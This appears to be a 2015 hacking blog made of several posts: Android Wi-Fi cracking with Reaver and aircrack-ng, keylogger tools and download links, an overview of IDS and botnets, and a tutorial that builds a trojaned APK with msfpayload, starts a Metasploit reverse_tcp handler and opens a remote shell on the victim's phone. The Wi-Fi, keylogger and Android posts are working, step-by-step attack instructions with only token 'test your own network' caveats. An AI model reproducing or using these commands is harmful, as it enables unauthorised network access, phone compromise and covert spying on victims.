Monday, July 27, 2015

How to Hack Wi Fi Using Android

Do you want to test your network security? It used to be that you needed a desktop OS such as Windows or Linux installed on a computer with a specific wireless network card. Now, however, you can also use certain Android devices to scan and crack wireless networks. These tools are available for free as long as your device is compatible. Hacking routers without permission is illegal. These steps are provided to test the security of your own network.

Method 1 of 2: WPA2 WPS Routers
Hack Wi Fi Using Android Step 1 Version 5.jpg


1
Root a compatible device. Not every Android phone or tablet will be able to crack a WPS PIN. The device must have a Broadcom bcm4329 or bcm4330 wireless chipset, and must be rooted. The Cyanogen ROM will provide the best chance of success. Some of the known supported devices include:
  • Nexus 7
  • Galaxy Ace/S1/S2/S3
  • Nexus One
  • Desire HD
Hack Wi Fi Using Android Step 2 Version 5.jpg

2
Download and install bcmon. This tool enables Monitor Mode on your Broadcom chipset, which is essential for being able to crack the PIN. The bcmon APK file is available for free from the bcmon page on the Google Code website.
  • To install an APK file, you will need to allow installation from unknown sources in your Security menu. Step 2 of this article goes into more detail.

Hack Wi Fi Using Android Step 3 Version 5.jpg

3
Run bcmon. After installing the APK file, run the app. If prompted, install the firmware and tools. Tap the "Enable Monitor Mode" option. If the app crashes, open it and try again. If it fails for a third time, your device is most likely not supported.
  • Your device must be rooted in order to run bcmon.
Hack Wi Fi Using Android Step 4 Version 5.jpg

4
Download and install Reaver. Reaver is a program developed to crack the WPS PIN in order to retrieve the WPA2 passphrase. The Reaver APK can be downloaded from the developers' thread on the XDA-developers forums.
Hack Wi Fi Using Android Step 5 Version 5.jpg

5
Launch Reaver. Tap the Reaver for Android icon in your App drawer. After confirming that you are not using it for illegal purposes, Reaver will scan for available access points. Tap the access point you want to crack to continue.
  • You may need to verify Monitor Mode before proceeding. If this is the case, bcmon will open again.
  • The access point you select must accept WPS authentication. Not all routers support this.
Hack Wi Fi Using Android Step 6 Version 5.jpg

6
Verify your settings. In most cases you can leave the settings that appear at their default. Make sure that the "Automatic advanced settings" box is checked.

Hack Wi Fi Using Android Step 7 Version 4.jpg


7
Start the cracking process. Tap the "Start attack" button at the bottom of the Reaver Settings menu. The monitor will open and you will see the results of the ongoing crack displayed.
  • Cracking WPS can take anywhere from 2-10+ hours to complete, and it is not always successful.[1]

Method 2 of 2: WEP Routers

Method 2 of 2: WEP Routers

Method 2 of 2: WEP Routers
Hack Wi Fi Using Android Step 8 Version 5.jpg

1
Root a compatible device. Not every Android phone or tablet will be able to crack
 a WPS PIN. The device must have a Broadcom bcm4329 or bcm4330 wireless chipset, and must be rooted. The Cyanogen ROM will provide the best chance of success. Some of the known supported devices include:
  • Nexus 7
  • Galaxy S1/S2/S3/S4/S5
  • Galaxy y
  • Nexus One
  • Desire HD
  • Micromax A67
Hack Wi Fi Using Android Step 9 Version 5.jpg


2
Download and install bcmon. This tool enables Monitor Mode on your Broadcom chipset, which is essential for being able to crack the PIN. The bcmon APK file is available for free from the bcmon page on the Google Code website.
  • To install an APK file, you will need to allow installation from unknown sources in your Security menu. Step 2 of this article goes into more detail.

Hack Wi Fi Using Android Step 10 Version 5.jpg

3
Run bcmon. After installing the APK file, run the app. If prompted, install the firmware and tools. Tap the "Enable Monitor Mode" option. If the app crashes, open it and try again. If it fails for a third time, your device is most likely not supported.
  • Your device must be rooted in order to run bcmon.

Hack Wi Fi Using Android Step 11 Version 2.jpg

4
Tap "Run bcmon terminal". This will launch a terminal similar to most Linux terminals.Type airodump-ng and tap the Enter button. AIrdump will load, and you will be taken to the command prompt again. Type airodump-ng wlan0 and tap the Enter button.

Hack Wi Fi Using Android Step 12 Version 2.jpg

5
Identify the access point you want to crack. You will see a list of available access points. You must select am access point that is using WEP encryption.

Hack Wi Fi Using Android Step 13.jpg

6
Note the MAC address that appears. This is the MAC address for the router. Make sure that you have the right one if there are multiple routers listed. Jot this MAC address down.
  • Also note the Channel that the access point is broadcasting on.
Hack Wi Fi Using Android Step 14.jpg

7
Start scanning the channel. You will need to collect information from the access point for several hours before you can attempt to crack the password. Typeairodump-ng -c channel# --bssid MAC address -w output ath0and tap Enter. Airodump will begin scanning. You can leave the device for a while as it scans for information. Be sure to plug it in if you are running low on battery.
  • Replace channel# with the channel number the access point is broadcasting on (e.g. 6).
  • Replace MAC address with the MAC address of the router (e.g 00:0a:95:9d:68:16)
  • Keep scanning until you reach at least 20,000-30,000 packets.
Hack Wi Fi Using Android Step 15 Version 2.jpg

8
Crack the password. Once you have a suitable number of packets, you can start attempting to crack the password . Return to the terminal and type aircrack-ng output*.cap and tap Enter.
Hack Wi Fi Using Android Step 16 Version 3.jpg


9
Note the hexadecimal password when finished. After the cracking process is complete (which could take several hours), the message Key Found! will appear, followed by the key in hexadecimal form. Make sure that "Probability" is 100% or the key 
will not work.[2]
  • When you enter the key, enter it without the ":". For example, if the key was 12:34:56:78:90, you would enter 1234567890.


Sunday, July 26, 2015

Keylogger Tutorial

Keylogger is a software program or hardware device that is used to monitor and log each of the keys a user types into a computer keyboard. The user who installed the program or hardware device can then view all keys typed in by that user. Because these programs and hardware devices monitor the keys typed in a user can easily find user passwords and other information a user may not wish others to know about.
Keyloggers, as a surveillance tool, are often used by employers to ensure employees use work computers for business purposes only. Unfortunately, keyloggers can also be embedded in spyware allowing your information to be transmitted to an unknown third party.


 About keyloggers

key loggersA keylogger is a program that runs in the background, recording all the keystrokes. Once keystrokes are logged, they are hidden in the machine for later retrieval, or shipped raw to the attacker. The attacker then peruses them carefully in the hopes of either finding passwords, or possibly other useful information that could be used to compromise the system or be used in a social engineering attack. For example, a keylogger will reveal the contents of all e-mail composed by the user. Keylogger is commonly included in rootkits.

A keylogger normally consists of two files: a DLL which does all the work and an EXE which loads the DLL and sets the hook. Therefore when you deploy the hooker on a system, two such files must be present in the same directory.

There are other approaches to capturing info about what you are doing.

    * Some keyloggers capture screens, rather than keystrokes.
    * Other keyloggers will secretly turn on video or audio recorders, and transmit what they capture over your internet connection. 

A keyloggers might be as simple as an exe and a dll that are placed on a machine and invoked at boot via an entry in the registry. Or a keyloggers could be which boasts these features:

    * Stealth: invisible in process list
    * Includes kernel keylogger driver that captures keystrokes even when user is logged off (Windows 2000 / XP)
    * ProBot program files and registry entries are hidden (Windows 2000 / XP)
    * Includes Remote Deployment wizard
    * Active window titles and process names logging
    * Keystroke / password logging
    * Regional keyboard support
    * Keylogging in NT console windows
    * Launched applications list
    * Text snapshots of active applications.
    * Visited Internet URL logger
    * Capture HTTP POST data (including logins/passwords)
    * File and Folder creation/removal logging
    * Mouse activities
    * Workstation user and timestamp recording
    * Log file archiving, separate log files for each user
    * Log file secure encryption
    * Password authentication
    * Invisible operation
    * Native GUI session log presentation
    * Easy log file reports with Instant Viewer 2 Web interface
    * HTML and Text log file export
    * Automatic E-mail log file delivery
    * Easy setup & uninstall wizards
    * Support for Windows (R) 95/98/ME and Windows (R) NT/2000/XP 



Tools: 

Ardamax Keylogger is a keystroke recorder that captures user's activity and saves it to an encrypted log file. The log file can be viewed with the powerful Log Viewer. Use this tool to find out what is happening on your computer while you are away, maintain a backup of your typed data automatically or use it to monitor your kids. Also you can use it as a monitoring device for detecting unauthorised access. Logs can be automatically sent to your e-mail address, access to the keylogger is password protected. Besides, Ardamax Keylogger logs information about the Internet addresses the user has visited.


This invisible spy application is designed for 2000, XP, 2003, Vista and Windows 7.
  • Security - allows you to protect program settings, Hidden Mode and Log file.
  • Application monitoring - keylogger will record the application that was in use that received the keystroke!
  • Time/Date tracking - it allows you to pinpoint the exact time a window received a keystroke!
  • Powerful Log Viewer - you can view and save the log as a HTML page or plain text with keylogger Log Viewer.
  • Small size – Ardamax Keylogger is several times smaller than other programs with the same features. It has no additional modules and libraries, so its size is smaller and the performance is higher.
  • Ardamax Keylogger fully supports Unicode characters which makes it possible to record keystrokes that include characters from Japanese, Chinese, Arabic and many other character sets.
  • It records every keystroke. Captures passwords and all other invisible text.
Other Features:
  • Windows 2000/2003/XP/Vista/Windows 7 support
  • Monitors multi-user machines
  • Automatic startup
  • Friendly interface
  • Easy to install
  
Download Ardamax Keylogger (1.94Mb)



Perfect Keylogger for Windows 98/2000/XP/Vista and Windows 7 

The latest, improved and most stealth version of Perfect Keylogger is now available only after purchase. To protect the product from abuse and improve its quality for the registered users, we no longer offer the trial version of the latest builds. The localized versions of Perfect Keyloger and 64-bit version are also available after purchase. The last public version is still available
, but keep in mind that it's not the latest and may be flagged by security software.

Download Perfect keylogger



Wednesday, July 22, 2015

Intrusion Detection System (IDS)

                                   Photobucket

>>Intrusion Detection System (IDS):
A system that tries to identify attempts to hack or break into a computer system or to misuse it. IDSs may monitor packets passing over the network, mo
nitor system files, monitor log files, or set up deception systems that attempt to trap hackers.

Computer systems have become more vulnerable to intrusions than ever. Intrusion Detection is a security technology that allows not only the detection of attacks, but
 also attempts to provide notification of new attacks unforeseen by other
 components. Intrusion detection is an important component of a security system,
and it complements other security technologies.

>>How does an IDS work?

While there are several types of IDSs, the most common types work the same.
They analyze network traffic and log files for certain patterns. What kind of
patterns you may ask? While a firewall will continually block a hacker from connecting to a network, most firewalls never alert an administrator.

The administrator may notice if he/she checks the access log of the firewall, but
that could be weeks or even months after the attack. This is where an IDS comes
into play. The attempts to pass through the firewall are logged, and IDS will analyze its log. At some point in the log there will be a large number of request-reject
entries. An IDS will flag the events and alert an administrator. The administrator
can then see what is happening right after or even while the attacks are still taking place. This gives an administrator the advantage of being able to analyze the techniques being used, source of attacks, and methods used by the hacker.

>>Following are the types of intrusion detection systems :-

1)Host-Based Intrusion Detection System (HIDS): Host-based intrusion detection
systems or HIDS are installed as agents on a host. These intrusion detection systems can look into system and application log files to detect any intruder activity.

2)Network-Based Intrusion Detection System (NIDS): These IDSs detect attacks by capturing and analyzing network packets. Listening on a network segment or
switch, one network-based IDS can monitor the network traffic affecting multiple
hosts that are connected to the network segment, thereby protecting those hosts. Network-based IDSs often consist of a set of single-purpose sensors or hosts placed
at various points in a network. These units monitor network traffic, performing local analysis of that traffic and reporting attacks to a central management console.

 >>Some important topics comes under intrusion detection are as follows :-


1)Signatures: Signature is the pattern that you look for inside a data packet. A signature is used to detect one or multiple types of attacks. For example, the
presence of “scripts/iisadmin” in a packet going to your web server may indicate
an intruder activity. Signatures may be present in different parts of a data packet depending upon the nature of the attack.

2)Alerts: Alerts are any sort of user notification of an intruder activity. When an IDS detects an intruder, it has to inform security administrator about this using alerts.
Alerts may be in the form of pop-up windows, logging to a console, sending e-mail and so on. Alerts are also stored in log files or databases where they can be viewed later on by security experts.

3)Logs: The log messages are usually saved in file.Log messages can be saved
either in text or binary format.

4)False Alarms: False alarms are alerts generated due to an indication that is not
an intruder activity. For example, misconfigured internal hosts may sometimes broadcast messages that trigger a rule resulting in generation of a false alert.
Some routers, like Linksys home routers, generate lots of UPnP related alerts. To
avoid false alarms, you have to modify and tune different default rules. In some
cases you may need to disable some of the rules to avoid false alarms.

5)Sensor: The machine on which an intrusion detection system is running is also called the sensor in the literature because it is used to “sense” the network.



>>SNORT:  

Snort is a very flexible network intrusion detection system that has a large set of pre-configured rules. Snort also allows you to write your own rule set. There are several mailing lists on the internet where people share new snort rules that can counter the latest attacks.

Snort is a modern security application that can perform the following three functions :

* It can serve as a packet sniffer.
* It can work as a packet logger.

* It can work as a Network-Based Intrusion Detection System (NIDS).


TOOLS:
Smooth-Sec 3.0 Intrusion Detection System

Smooth-Sec is a lightweight and fully-ready IDS/IPS (Intrusion Detection/Prevention System) Linux distribution based on Debian 7 (wheezy), available for 32 and 64 bit architecture. The distribution includes the latest version of Snorby, Snort, Suricata, PulledPork and Pigsty. An easy setup process allows to deploy a complete IDS/IPS System within minutes, even for security beginners with minimal Linux experience.

  •     Debian 7 Wheezy based
  •     32 and 64 bit iso available. Snorby V 2.6.2
  •     Snort V 2.9.4.6
  •     Suricata V 1.4.3
  •     Pigsty V 0.1.0
  •     PulledPork V 0.6.1

Download:

32-Bit – smoothsec-3.0-i386.iso
64-Bit – smoothsec-3.0-amd64.iso

Bug Bounty Web List

What is the Bug Bounty Program ?

Bug Bounty program provides recognition and compensation to security researchers practicing responsible disclosure. Company started Bug Bounty programs for improve their security, Cyber security researchers are finding vulnerabilities on top websites and get rewarded. 

Reward Program
(To submit you need to sign up to the free
Developer API program)

Product & Services (Hall Of Fame Only)



Botnets

A botnet or robot network is a group of computers running a computer application controlled and manipulated only by the owner or the software source. The botnet may refer to a legitimate network of several computers that share program processing amongst them.

Usually though, when people talk about botnets, they are talking about a group of computers infected with the malicious kind of robot software, the bots, which present a security threat to the computer owner. Once the robot software (also known as malicious software or malware) has been successfully installed in a computer, this computer becomes a zombie or a drone, unable to resist the commands of the bot commander.

A botnet may be small or large depending on the complexity and sophistication of the bots used. A large botnet may be composed of ten thousand individual zombies. A small botnet, on the other hand may be composed of only a thousand drones. Usually, the owners of the zombie computers do not know that their computers and their computers’ resources are being remotely controlled and exploited by an individual or a group of malware runners through Internet Relay Chat (IRC)

There are various types of malicious bots that have already infected and are continuing to infect the internet. Some bots have their own spreaders – the script that lets them infect other computers (this is the reason why some people dub botnets as computer viruses) – while some smaller types of bots do not have such capabilities.


Different Types of Bots

Here is a list of the most used bots in the internet today, their features and command set.

XtremBot, Agobot, Forbot, Phatbot

These are currently the best known bots with more than 500 versions in the internet today. The bot is written using C++ with cross platform capabilities as a compiler and GPL as the source code. These bots can range from the fairly simple to highly abstract module-based designs. Because of its modular approach, adding commands or scanners to increase its efficiency in taking advantage of vulnerabilities is fairly easy. It can use libpcap packet sniffing library, NTFS ADS and PCRE. Agobot is quite distinct in that it is the only bot that makes use of other control protocols besides IRC.

UrXBot, SDBot, UrBot and RBot

Like the previous type of bot, these bots are published under GPL, but unlike the above mentioned bots these bots are less abstract in design and written in rudimentary C compiler language. Although its implementation is less varied and its design less sohisticated, these type of bots are well known and widely used in the internet.

GT-Bots and mIRC based bots
These bots have many versions in the internet mainly because mIRC is one of the most used IRC client for windows. GT stands for global threat and is the common name for bots scripted using mIRC. GT-bots make use of the mIRC chat client to launch a set of binaries (mainly DLLs) and scripts; their scripts often have the file extensions .mrc.
Malicious Uses of Botnets

Types Of Botnet Attack

Denial of Service Attacks
A botnet can be used as a distributed denial of service weapon. A botnet attacks a network or a computer system for the purpose of disrupting service through the loss of connectivity or consumption of the victim network’s bandwidth and overloading of the resources of the victim’s computer system. Botnet attacks are also used to damage or take down a competitor’s website.

Fast flux is a DNS technique used by botnets to hide phishing and malware delivery sites behind an ever-changing network of compromised hosts acting as proxies.
Any Internet service can be a target by botnets. This can be done through flooding the website with recursive HTTP or bulletin-board search queries. This mode of attack in which higher level protocols are utilized to increase the effects of an attack is also termed as spidering.

Spyware 
Its a software which sends information to its creators about a user's activities – typically passwords, credit card numbers and other information that can be sold on the black market. Compromised machines that are located within a corporate network can be worth more to the bot herder, as they can often gain access to confidential information held within that company. There have been several targeted attacks on large corporations with the aim of stealing sensitive information, one such example is the Aurora botnet.

Adware
Its exists to advertise some commercial entity actively and without the user's permission or awareness, for example by replacing banner ads on web pages with those of another content provider.

Spamming and Traffic Monitoring

A botnet can also be used to take advantage of an infected computer’s TCP/IP’s SOCKS proxy protocol for networking appications. After compromising a computer, the botnet commander can use the infected unit (a zombie) in conjunction with other zombies in his botnet (robot network) to harvest email addresses or to send massive amounts of spam or phishing mails.

Moreover, a bot can also function as a packet sniffer to find and intercept sensitive data passing through an infected machine. Typical data that these bots look out for are usernames and passwords which the botnet commander can use for his personal gain. Data about a competitor botnet installed in the same unit is also mined so the botnet commander can hijack this other botnet.

Access number replacements are where the botnet operator replaces the access numbers of a group of dial-up bots to that of a victim's phone number. Given enough bots partake in this attack, the victim is consistently bombarded with phone calls attempting to connect to the internet. Having very little to defend against this attack, most are forced into changing their phone numbers (land line, cell phone, etc.).

Keylogging and Mass Identity Theft
An encryption software within the victims’ units can deter most bots from harvesting any real information. Unfortunately, some bots have adapted to this by installing a keylogger program in the infected machines. With a keylogger program, the bot owner can use a filtering program to gather only the key sequence typed before or after interesting keywords like PayPal or Yahoo mail. This is one of the reasons behind the massive PayPal accounts theft for the past several years.

Bots can also be used as agents for mass identity theft. It does this through phishing or pretending to be a legitimate company in order to convince the user to submit personal information and passwords. A link in these phishing mails can also lead to fake PayPal, eBay or other websites to trick the user into typing in the username and password.

Botnet Spread
Botnets can also be used to spread other botnets in the network. It does this by convincing the user to download after which the program is executed through FTP, HTTP or email.

Pay-Per-Click Systems Abuse
Botnets can be used for financial gain by automating clicks on a pay-per-click system. Compromised units can be used to click automatically on a site upon activation of a browser. For this reason, botnets are also used to earn money from Google’s Adsense and other affiliate programs by using zombies to artificially increase the click counter of an advertisement.

Monday, July 20, 2015

Hack Android Remotely Using Kali Linux


This is a tutorial explaining how to remotely hack android device using Metasploit in Kali Linux.



Read my previous articles to setup Kali Linux:
Metasploit is one of my favorite security tools. What some don’t know is that Metasploit has added some functionality for security testing Android Devices. In this post we will show you how to get a remote shell on an Android by using Metasploit in Kali Linux.


Read this article to know more about Metasploit: Introduction to using Metasploit in Kali Linux

We will do this by creating a “malicious” Android program file, an APK file, so that once it is run, it will connect out to our attacking machine running Metasploit. We will set Metasploit up to listen for the incoming connection and once it sees it, create a fully functional remote shell to the device.

First up you need to find your public/external ip and port forwarding 

Let's start,

Creating a booby trapped APK file


Now we need to create the APK that will include a remote shell. To do so, we will use the msfpayload command from Metasploit.

1. In Kali Linux, open a terminal prompt and type:

sudo msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.16 LPORT=4444 R >app.apk

(Replace the highlighted part with your Kali Linux IP address in for the LHOST address and forwarded port in for theLPORT address.)



The msfpayload command takes one of the meterpreter payloads and allows you to create a stand alone file with it.

Once this is run, a file called “app.apk” will be created:





2. Now just send this file to your Android device, I used a Smart Phone in this instance.

3. When the file is installing on the Android, it will come up like all apps and show you what capabilities it wants access to on your phone. It lists like every possibility I think, basically total access to the phone. This should be a warning to users that this isn’t an app that they should be running!

Now that the “evil” app is installed, we need to set Metasploit up to listen for incoming connections.

4. In Kali, start Metasploit from the menu or by typing “msfconsole” in a Terminal window.

5. Once Metasploit starts, type in the following to create a listener:


user exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.16 (enter your Kali IP address)
set lport 4444


Then just type exploit to start the handler:





6. Run the App on your Android device. It should show up as a big “M” icon with a name something like “Main Activity”.

7. A big button will appear on your phone that says, “ReverseTcp”, when it is pressed, your phone will connect out to the Metasploit system and a remote shell session is created.

On your Metaploit system you should see this:





An active session is created and it drops you automatically into a meterpreter prompt.

8. From here your can type “sysinfo” to get information on the device:




9. You can see the processes running by typing, “ps”:



You are done!

Now you can surf the Android device remotely by using standard Linux commands like ls, pwd, and cd. The Download directory usually has interesting things in it.

Though it errored out on mine, you can type “webcam_list” to get a list of the phone’s web cams, then “webcam_snap” to take a snapshot from the webcam.

Typing “help” at a meterpreter prompt will list all the command that are available.

We can also run the shell command that will drop us into a direct Terminal shell if we want:



meterpreter > shell
Process 1 created.
Channel 1 created.
ls


The Android phone in this example was not rooted, so I could not access the stored passwords, texts or phone logs.

But if the phone was rooted, I should have been able to access them… Remotely…

This should be noted by people who have rooted their phone!

And that is it! One wrong app installed by a user and an attacker could get remote access to your phone or other Android device. Did I mention that the phone was running an Anti-Virus program from a major vendor? It had no problems with letting my remote shell run…

Pay special attention to the rights and capabilities that an app wants when installing new apps. If a game wants full access to your phone, including the ability to make pay phone calls, this should be a red flag.

Evil Twin attack

Evil Twin Attack is attack is frequently carried upon wireless access points with malicious intentions. This attack happens when...